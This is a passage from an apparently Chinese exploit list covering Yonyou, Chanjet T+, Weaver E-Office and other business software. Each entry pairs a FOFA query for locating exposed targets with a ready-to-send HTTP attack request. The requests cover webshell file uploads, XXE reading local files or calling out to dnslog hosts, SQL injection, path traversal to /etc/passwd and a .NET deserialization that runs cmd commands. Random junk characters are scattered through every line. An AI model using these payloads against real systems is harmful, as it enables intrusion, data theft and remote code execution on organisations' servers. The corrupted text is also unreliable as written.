/ e$ B) z. d5 t! Y& wFOFA:app="用友-NC-Cloud"( v7 b) m) E. x/ @' t3 [
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
* h# A% @3 x4 P8 t" CHost: 203.25.218.166:8888" l' g" b8 [# I7 ~) T
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info$ a' z' U/ D" M# N% E
Accept-Encoding: gzip, deflate
4 y6 X0 b# ^/ sAccept: */*0 O) D# B0 l; F) V
Connection: close. R" Y1 [, Q, f I
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA1 e! V4 p. P3 v# S$ g
Content-Length: 1904 F: Z* l8 E/ [3 r0 Q( l/ u+ B
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df04 o4 }& M% J: I1 ]6 f+ n3 a7 p
: P3 z6 X! o& R9 d--fd28cb44e829ed1c197ec3bc71748df0
6 r, \$ R I, L `Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"# ~; ~7 ~1 ]5 t) P. i7 e' t& _5 G
0 T3 j/ B n% a) f$ I$ [ j<%out.println(1111*1111);%>
, k# K1 n& e \0 h--fd28cb44e829ed1c197ec3bc71748df0--6 R# o, H. ^" J9 t g+ @
6 `' r3 V- y7 e* X2 t
1 B# H/ M: p% Z+ m3 @2 w
36. 用友NC-Cloud soapFormat XXE/ L" | Q: ~/ P) C& B
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"+ r0 e Q. h, H2 ~. Y# v& F
POST /uapws/soapFormat.ajax HTTP/1.1
& u. s6 y7 b& a3 s& `Host: 192.168.40.130:8989
* Z; k; W# C) w$ o: T4 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0: I9 D9 H; [; @) M
Content-Length: 2632 j; ?) o3 p+ q7 ^3 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% h" H+ P: E$ s, v/ h" K; G; ~Accept-Encoding: gzip, deflate
9 l" i7 s8 _8 Z3 g+ ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ w! l) \4 y+ q; l0 }$ w* z$ D/ W4 YConnection: close
- P% ~6 H# Y* \4 |9 L4 W' c! n& yContent-Type: application/x-www-form-urlencoded+ G8 t% C1 v$ G4 v
Upgrade-Insecure-Requests: 18 l" u6 m5 U7 [ h
$ U" R3 Q! S! Cmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
- b6 L: _: z5 O! G/ ^9 ^1 r. N: M; f: a' e6 V
) f- Z5 w/ s4 I$ I
37. 用友NC-Cloud IUpdateService XXE
9 t7 t! [9 M+ ]4 gFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
* p5 b7 t+ x9 l5 S- e$ \POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
/ a: u! [! X) E6 j3 `) P& yHost: 192.168.40.130:89898 x/ I/ x. K! u- M L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" z5 O% w4 c0 {- z9 |" ]: P6 g
Content-Length: 4215 t( h! \6 s8 z; j: ?1 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
' |2 v! [; k5 D# q" _/ }Accept-Encoding: gzip, deflate
' @1 f- U) ]- p6 @Accept-Language: zh-CN,zh;q=0.9
7 y. z* {# M8 SConnection: close
/ w6 ~ H2 [3 j% BContent-Type: text/xml;charset=UTF-8
, R( |5 `% K0 | J$ |4 _5 p8 CSOAPAction: urn:getResult* o3 v7 i: {7 t1 D X
Upgrade-Insecure-Requests: 1
* s0 [' p7 @, ~/ y# J/ V3 |
9 C |, _# w, U3 N<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
8 G: v/ w! Z+ z9 O<soapenv:Header/>& t0 |( \6 E$ E! c/ K, z
<soapenv:Body>+ ^6 x. _8 p9 @, j
<iup:getResult>" t! Y! a; W9 ~5 \/ F+ F; @
<!--type: string-->
3 z I7 n |% K9 S& E/ ~<iup:string><![CDATA[8 h& L) }1 O, b# T, C
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
* o! h$ K: r! u<xxx/>]]></iup:string>
* H% c$ s3 A/ a( r4 S& S</iup:getResult>5 {8 f: Q! b. f+ M& r( T
</soapenv:Body>
, N1 i) v3 b" e/ o</soapenv:Envelope>8 u, v6 m& [4 _& P8 p
Y. }& Y+ a$ f
8 b5 w( p& N; c+ C, O0 A$ @
. h; X: Z/ R. C: N$ V( u3 ~) X" h$ U38. 用友U8 Cloud smartweb2.RPC.d XXE( |- g9 `3 K8 Y* M# `; W" T" p) `
FOFA:app="用友-U8-Cloud". K5 D0 D% c7 U D5 s& B( A2 h6 j8 p
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
, k) {9 H# S4 g* \ C0 b0 n8 NHost: 192.168.40.131:80883 N1 H" D2 |6 N+ y% h% F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25% i I0 ~6 G/ m
Content-Length: 2609 c% G" Q4 t. p* g+ w1 `$ C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3! a9 }, T6 i5 x) A
Accept-Encoding: gzip, deflate
& F4 j% X; {1 \: DAccept-Language: zh-CN,zh;q=0.9
+ U% O* }& X/ ~. l2 i$ F9 T) L ]Connection: close
' ?! T; c' f! a2 F7 oContent-Type: application/x-www-form-urlencoded. @+ w: r5 @9 }5 b) ]6 q
# P1 P2 K4 m* h9 C% |
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>' T6 U. u' m9 o# j( r& U
1 f9 h, `: @1 n2 l. s8 f2 ~- B2 u
3 z& [- T% X2 {7 p
39. 用友U8 Cloud RegisterServlet SQL注入
) N9 J) a p$ F/ Z# IFOFA:title="u8c"7 \" h5 |! X$ o
POST /servlet/RegisterServlet HTTP/1.1
5 J1 |& n7 @- m# NHost: 192.168.86.128:80894 h! f8 F$ ], `# L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
7 @5 H& I, e. Y+ D2 zConnection: close
! {8 j2 N9 Y/ B6 q9 w5 r% V$ f( HContent-Length: 85
0 N3 e/ j2 V4 m9 M$ ^+ l3 U h$ nAccept: */*1 K* L+ v u9 M& B: J* {
Accept-Language: en
' f. @) x! e: L* B0 Z" X& d6 CContent-Type: application/x-www-form-urlencoded
3 S/ v; ~, G* P6 YX-Forwarded-For: 127.0.0.1
: I6 h, n5 f8 |( ?6 V0 ?/ c: z, f0 aAccept-Encoding: gzip7 k& l7 t6 q! `% G
0 s( K. ]% p% z5 ~1 i7 h, p
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
% A4 s7 X6 _$ o5 x/ r; C7 s4 c0 f: h& `( C. P
. S6 v7 N8 A D( {. _, v40. 用友U8-Cloud XChangeServlet XXE) v# q! n1 T P( y
FOFA:app="用友-U8-Cloud"& ?# F! u' F! X* f9 Z6 C
POST /service/XChangeServlet HTTP/1.1
6 b: v5 O+ R3 q2 rHost: x.x.x.x: ^" w) t9 H& s9 I% C \4 `
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
4 Y% @2 ]3 R% A EContent-Type: text/xml
8 t2 x$ }8 B* o$ P: K: P" ?Connection: close7 |2 a( C; b) R8 j7 Z
7 ]. l6 j4 q: R: I' O<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>3 ?% p& ]% d: B6 P/ Z. o7 R
" T4 Y; @5 Y4 T$ L2 Q& s |
# _# `+ [+ Z# C2 R S% Z1 J41. 用友U8 Cloud MeasureQueryByToolAction SQL注入0 E" A, a' W+ m+ i
FOFA:app="用友-U8-Cloud". k& S+ n, E: j: ?0 f
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
+ a5 I2 Y2 x' O( {/ I9 ? S: QHost:
8 ?7 c0 A0 o( R q3 K8 A8 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* q* X) v; _/ P" X# j0 aContent-Type: application/json
8 n# t2 D: i) CAccept-Encoding: gzip4 R! ?( V* [/ U5 r; l7 z5 |
Connection: close
) V8 I+ r& [4 L6 }/ p! @2 ?# J9 U" ^6 z0 s: y/ Z! k0 n! H
$ h7 z8 `) c3 v- G3 ?
42. 用友GRP-U8 SmartUpload01 文件上传
, o) }) C: ^- e8 D, i0 i: LFOFA:app="用友-GRP-U8"
/ w% h- m! ~/ k: K+ q$ P, gPOST /u8qx/SmartUpload01.jsp HTTP/1.1
- H* ^. H" K- R* H+ ZHost: x.x.x.x
, m. ^3 w) ^& w8 C5 V" ?* NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt6 Q5 R6 ]% V1 E5 z* r4 d5 ~1 W# T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36! o% [& m8 R! Q( m Q
. ? c- {" E5 q, T
PAYLOAD! g @7 f3 e8 R5 n7 E2 N1 e/ Q6 A
! K" L$ V# \- L" R$ W
0 e6 P. \0 z4 V/ F2 H3 d$ khttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
( P Q$ X* |1 ~& m, w) v
9 Q( P( {: b: `" d1 l- h43. 用友GRP-U8 userInfoWeb SQL注入致RCE( k8 _, ~( s8 v0 X* S
FOFA:app="用友-GRP-U8"5 C: _' U) Q- C
POST /services/userInfoWeb HTTP/1.1
/ j' @7 H( [. ] UHost: your-ip
# [: t* D* j1 J* a* W. ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 w Z% Z/ g& Z# j" N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- A+ F& A5 X+ [! F; [: R* ]# T1 vAccept-Encoding: gzip, deflate
" }2 h3 X- y) W! n! z5 vAccept-Language: zh-CN,zh;q=0.9
% o+ B/ U$ r6 Q* C7 wConnection: close
3 j6 o5 i; N& YSOAPAction:
3 ?/ l+ A% N5 Y/ eContent-Type: text/xml;charset=UTF-8# K% s( I7 p* G' P# a. Y
, C2 S* f9 g$ D( R7 Q/ c: ]! k$ r
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
( ~/ H# X0 ?' _& T+ T7 U( H <soapenv:Header/>4 |/ I" U |8 i
<soapenv:Body>
$ H) ]0 B' I+ q( j! T @ <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">' _4 `0 n0 B9 ~
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>- @' ?. } ^! a# G
</ser:getUserNameById>
3 N3 }* G' n2 e# o+ o; h </soapenv:Body>
/ b s/ G9 h! X</soapenv:Envelope>
# }/ R' r" J" T0 ~+ l8 H1 b
8 _: M; `* s2 R+ ]( B' ^8 W
! }$ v- T6 c7 ^( Q44. 用友GRP-U8 bx_dj_check.jsp SQL注入% X ?% |; [' B4 W) x, n+ f' t9 Z
FOFA:app="用友-GRP-U8"
' g) e/ j& O' vGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.17 ^4 l3 v& ] a$ C M. {
Host: your-ip9 F3 L0 P b* z' a7 E# o( p/ j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36. ~5 x; F# j3 ~, `* Q( z7 R `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) l$ x+ l- f! s9 FAccept-Encoding: gzip, deflate
* e$ a5 W) V. d: L; ]Accept-Language: zh-CN,zh;q=0.9
+ {9 i% I" X* J% k5 YConnection: close
# v2 k4 J. N, N$ f
# h- K6 _4 p2 S% D
+ w- z& P* H" G45. 用友GRP-U8 ufgovbank XXE7 B. u# \- b5 X' O" W
FOFA:app="用友-GRP-U8"7 _2 O7 y0 ] {& ~; K! G
POST /ufgovbank HTTP/1.1
) v+ N$ f# x2 |2 jHost: 192.168.40.130:222( }7 @ v. I. u+ h- {( b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.03 l! Y" ]1 u3 O& m- X3 H
Connection: close+ u) x( r2 n1 ~+ ^! n
Content-Length: 161
% V2 W; u: T( ]3 U- QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% q7 n+ A- f- R" u3 C. }; l2 ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- a# z# h3 l; @2 B. c& X0 h1 H
Content-Type: application/x-www-form-urlencoded3 y, J W9 ^* e$ C: k
Accept-Encoding: gzip8 t" H2 r% Y' f
; T* `8 o' ]6 L T1 ]reqData=<?xml version="1.0"?>
; j6 K6 L; C" \) g1 U<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
, o9 I5 x1 x1 h3 _6 Z! a& {/ h6 o) J# m# `
# w; _2 g" B4 s2 _" F, `
46. 用友GRP-U8 sqcxIndex.jsp SQL注入$ ?! f9 T w) _/ b- D3 v
FOFA:app="用友-GRP-U8"5 K4 [' X+ D+ m) F- f! z! M( u; x
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
5 C g( n* T7 I* Y0 I3 WHost: your-ip; ^4 d4 d8 b) K, L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36' p0 z- D0 W+ }5 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& Z/ X- @2 y7 y9 O
Accept-Encoding: gzip, deflate, P: S* w$ L; L; T; t0 r9 g* o
Accept-Language: zh-CN,zh;q=0.9
v1 x( J. }. i9 lConnection: close
) U8 a& |8 w! k; ]8 C. h' y8 U6 w, Z" T3 n4 E( l0 m% u8 X) L
; N! K# k! a/ _% b6 [4 K47. 用友GRP A++Cloud 政府财务云 任意文件读取
% Q) N- i- z* W# K8 D" tFOFA:body="/pf/portal/login/css/fonts/style.css"+ ]6 p& w. F3 ^, j9 G. `
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
\2 t4 S# m! C% gHost: x.x.x.x4 u0 Y3 q$ n: Q9 @3 G
Cache-Control: max-age=0
. t2 a! {& }; V! L6 q- RUpgrade-Insecure-Requests: 1
' ?% N4 [9 O8 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; G! R" `! s4 H/ F9 Q2 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 b( V' Y9 W" |9 ]0 hAccept-Encoding: gzip, deflate, br' a2 Z! K& c: G" p: x6 v2 e( e
Accept-Language: zh-CN,zh;q=0.9; D- ~8 X& w% X. Y! f8 H3 y
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT( h8 p0 g; S( W) F5 D
Connection: close
; w( T( \7 r! g1 ?" v( v
1 z `6 g4 ^$ _$ H
3 I; Z5 k: l: }0 v! U f6 @. {/ J8 f
48. 用友U8 CRM swfupload 任意文件上传
8 K! M% m& k7 U7 S( d- FFOFA:title="用友U8CRM"( c- }6 _% O% C- A( [
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1& C5 ^$ x/ a- X" v d5 p/ K, b
Host: your-ip) z: G" f I& l/ Q; N( G- }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 B1 w3 ^; r' r N! PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ ^( R I$ @! x! mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ x+ E' ?/ e0 f, |1 A% d- I6 W1 JAccept-Encoding: gzip, deflate3 W1 o* a5 V' z" ~4 D: {
Content-Type: multipart/form-data;boundary=----2695209672394068716424300668557 r9 ^- G7 c% N; Q' V, P
------2695209672394068716424300668555 F% D! F- Z/ b
Content-Disposition: form-data; name="file"; filename="s.php"2 ]! `, Z0 K8 H0 {/ o
12311 n: x6 T5 K4 ]: U$ q. m! x
Content-Type: application/octet-stream' w, F; T& l1 H: O
------269520967239406871642430066855: i0 s# b$ ?/ f$ d
Content-Disposition: form-data; name="upload"
& C; f' m; \# i0 fupload
- C! N$ e* z* L7 U( Y# o7 T+ H9 A T, R------269520967239406871642430066855--
! G( C: O5 }5 B, H- C3 L
( }* v# p1 r& P' A9 F* o! P/ m9 f7 P+ t9 s) w+ a
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
& `( q) T( I& ?0 R3 @4 I+ PFOFA:body="用友U8CRM"
: J& o+ ]) z# j. d9 z7 I5 a& y" u8 x7 C7 s
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
1 v5 G2 X$ y( Q" w; ZHost: x.x.x.x2 M# c, v e9 U- |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 j9 L6 K3 ^: r" q2 [( f: J
Content-Length: 329
]3 S! e9 h. K2 o% PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 j' P [1 x, u$ ^; u, Y
Accept-Encoding: gzip, deflate. W# A) Y5 x- H5 T& Y' I u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' u; ^5 o1 g8 S) p$ k( V" Q5 V. C: h+ kConnection: close/ y5 Y) k. L& V' B, n
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w! ?/ T9 E2 x" n) R- ?
! K( D3 M2 U9 k( V; u-----------------------------vvv3wdayqv3yppdxvn3w
0 O; V$ n* {1 a$ @1 R+ M6 J; c1 LContent-Disposition: form-data; name="file"; filename="%s.php "
# e9 \: a6 z# }Content-Type: application/octet-stream( y$ F7 o" Z4 d! \- u, B; {
5 }3 K- V% k! h2 }- I
wersqqmlumloqa
% c. c' S2 f& R H0 C-----------------------------vvv3wdayqv3yppdxvn3w
& `$ \* B! y: n; y( UContent-Disposition: form-data; name="upload"
& d+ T( f$ a2 I0 m, u) C9 \
3 P4 m$ n8 i$ Xupload
4 T3 w$ p- o1 d0 Q-----------------------------vvv3wdayqv3yppdxvn3w--
% ]7 `* I, j# N# q, i0 D3 F+ q! W, a$ n' i4 p! ?. W
8 h0 S* ^( I: O! r* Q0 H. t4 |http://x.x.x.x/tmpfile/updB3CB.tmp.php! s& w2 o Q7 s8 o1 T- G0 A% W( s
' d, N% X' C0 I: m/ J7 i( n
50. QDocs Smart School 6.4.1 filterRecords SQL注入4 v' m( w" W) {- u, W
FOFA:body="close closebtnmodal"
4 H* w$ \% _# Z$ d1 y2 W& w g. GPOST /course/filterRecords/ HTTP/1.1; G1 o2 U) g$ z# u8 @. v
Host: x.x.x.x2 r& m6 ^, U9 S# c- `1 o. o
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
' F' |& L2 M uConnection: close
# [2 g" i& I# Q: {* H* WContent-Length: 224
" t( t3 u, x0 w6 ` [% s) NAccept: */*
6 o' p8 M& u c8 Z( J2 }' MAccept-Language: en0 _. W7 L, q+ I% @" `" L# t! @
Content-Type: application/x-www-form-urlencoded# n- P- _% Z5 ]4 H. u- h9 @' M/ S
Accept-Encoding: gzip6 _7 |8 ~% u8 m$ H" P8 U# f3 I
/ Q& N' \5 V6 K7 L" \8 {" i
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1! p& E9 n7 e5 A4 ^; I
q% b5 x G0 J/ E, I2 X" S. t& Q) ^* H3 Y: D+ q
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
! V6 ]4 W c* F6 H, q A, O0 l7 p: gFOFA:app="云时空社会化商业ERP系统"
& d; Q- K. _9 f9 M, F. U1 \5 vGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1- ?0 W, I$ ^( q# Z
Host: your-ip% f: H4 R3 y5 |9 H6 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36( x2 ]! C9 Z! U% H$ @) ]- C) `1 N9 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ @) w4 a# T3 z @
Accept-Encoding: gzip, deflate$ z4 I; u$ I) b- O
Accept-Language: zh-CN,zh;q=0.9! C8 B7 R+ p# o3 ]2 p1 p
Connection: close6 r& D9 u2 W* ^9 j, W
* y: C! P+ B P% m" T7 R3 W
8 q4 r Q( _ h3 O" P: w, d52. 泛微E-Office json_common.php sql注入3 o6 {& O: f1 R( o6 t1 T2 @
FOFA:app="泛微-EOffice"9 c: |# M& t. J( U r \( u
POST /building/json_common.php HTTP/1.1: P1 a; j. |1 ?5 n2 X8 o
Host: 192.168.86.128:8097& Y; |+ _3 E! y# z* N" Y4 e. L' D
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 Q, R3 q3 X6 r2 P D' pConnection: close% L; |9 \3 Z& c8 C# I9 t
Content-Length: 87
, T" j9 o% e2 Z2 J ^$ _# a& wAccept: */*# s8 y" a0 z S" z/ Q7 L
Accept-Language: en
$ l2 q* `3 W" ?& cContent-Type: application/x-www-form-urlencoded
+ P! n* V" S8 kAccept-Encoding: gzip3 h* m. v* j2 Y
( }9 b ?/ Z" _: w9 q7 e/ u8 C' htfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333, x$ q+ D1 D' n6 `1 X/ e
$ [: m3 l# A2 Z( T
* h6 H) E7 A6 _7 a
53. 迪普 DPTech VPN Service 任意文件上传
, B8 D: t3 h5 a( y4 K, t( \FOFA:app="DPtech-SSLVPN"
* r, l2 ]" |" {8 j# ~4 f/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd' Q' m$ }1 ^" y/ I, \1 b
2 i' a' o9 }! v0 ^
8 u6 R9 U* ~8 U, J/ M' a" S/ a54. 畅捷通T+ getstorewarehousebystore 远程代码执行2 x: Y- k% G( Y3 h6 |7 Q. I+ f
FOFA:app="畅捷通-TPlus"
N" ? ~" {; l0 u" W6 \/ [第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件 z C1 O8 w* J5 E8 _. b; p+ s
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"8 M3 c- A) q* O. m
7 Z( N7 v7 g+ b! n$ m; G& l- I) G( S) m/ ^1 F0 r& u8 W! P
完整数据包
* W7 m+ P, W8 o! |# j. NPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
6 Y1 H" r) `. F8 B, vHost: x.x.x.x3 C% T- R0 S. @! R; u8 V+ v
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F# R; t3 Q3 f: h7 b6 k7 \+ o
Content-Length: 593
1 F8 p, U4 z, h7 P
1 [1 |+ }. {* K0 c{$ }3 R6 F( Z1 a( r4 ^
"storeID":{( O6 }( ^6 F; z6 P4 h* w+ P( b
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",8 ^" H6 B" Q6 s& _! M
"MethodName":"Start",
9 N. F8 C# y7 t: o "ObjectInstance":{* E7 W7 ^! A7 K/ P0 u% z; a
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
& P) k' |5 D3 Z$ M0 D) s# s "StartInfo":{
* N" _2 T$ C# B7 w) M- m "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",. ~* e1 x, S( w8 {3 Z
"FileName":"cmd",1 ]5 r- W3 Z+ W# o r0 s
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"! M8 N& X$ t3 w: q# j4 Q
}
" D, D9 \1 J+ H( { }
0 H B& R W# `/ _- R2 S# s! p }
6 q3 p/ J5 `, N, B7 G- J9 f}
8 a* y0 r! f3 w' p
7 `* R2 L9 E1 r3 Z
+ W- \1 `" [9 @+ q( H. b' y第二步,访问如下url3 [2 E5 D$ ]- w" e# O' K: w# G
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
4 b" S2 R: e1 {0 F. R I0 ~# F
4 c6 r& {0 `. b! h# x; C
( V6 i6 B7 o4 S: h J# f9 h _, g55. 畅捷通T+ getdecallusers信息泄露: j& H4 b& {; T
FOFA:app="畅捷通-TPlus"6 a; _4 \+ j! G
第一步,通过
+ J" ~7 e3 n+ _+ ~( H/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie) x# L2 `# O, @, o9 Q: A
第二步,利用获取到的Cookie请求- \2 Y$ n6 R( X3 C) U) M+ ^ ^4 G
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
7 @" F3 h, ^/ S0 j6 _! y0 N
; Q0 ]$ p& l7 G0 ^6 U2 m, A56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE+ X! ?" g- q4 X& S' S
FOFA: app="畅捷通-TPlus"
) w9 n( O, O- L6 K% gPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
+ D( |2 _$ |* w* N' QHost: x.x.x.x' \; ?- p* Z2 q/ g" }( @! m
